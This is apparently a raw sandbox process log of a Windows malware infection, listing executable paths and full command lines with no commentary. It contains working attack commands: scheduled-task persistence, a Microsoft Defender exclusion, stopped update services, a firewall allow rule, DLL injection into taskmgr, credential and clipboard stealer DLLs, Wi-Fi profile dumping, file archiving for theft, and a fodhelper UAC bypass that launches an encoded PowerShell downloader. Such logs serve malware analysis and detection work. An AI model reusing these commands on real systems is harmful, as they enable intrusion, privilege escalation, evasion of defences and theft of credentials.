C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\6518.exe

C:\Users\Admin\AppData\Local\Temp\6518.exe

C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp" /SL5="$701DE,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"

C:\Users\Admin\AppData\Local\Temp\6D08.exe

C:\Users\Admin\AppData\Local\Temp\6D08.exe

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\721A.exe

C:\Users\Admin\AppData\Local\Temp\721A.exe

C:\Users\Admin\AppData\Local\Temp\77A9.exe

C:\Users\Admin\AppData\Local\Temp\77A9.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6518.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8096 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6336 -ip 6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6518.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Users\Admin\AppData\Roaming\1000068000\Kuteiisd.exe

"C:\Users\Admin\AppData\Roaming\1000068000\Kuteiisd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8468 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2428 -ip 2428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 80

C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe

"C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe"

C:\ProgramData\DefendSecurity\SecurityHealthService.Scan

C:\ProgramData\DefendSecurity\SecurityHealthService.Scan -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tS7R2.brk')}"

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\873812795143_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9460 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x490 0x3bc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10140 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10140 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA" /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f

C:\Windows\system32\fodhelper.exe

"C:\Windows\system32\fodhelper.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:1

C:\Users\Public\Music\SystemProcessHost.SystemProcesses

"C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9184 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" import C:\Users\Public\Music\ass

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\taskkill.exe

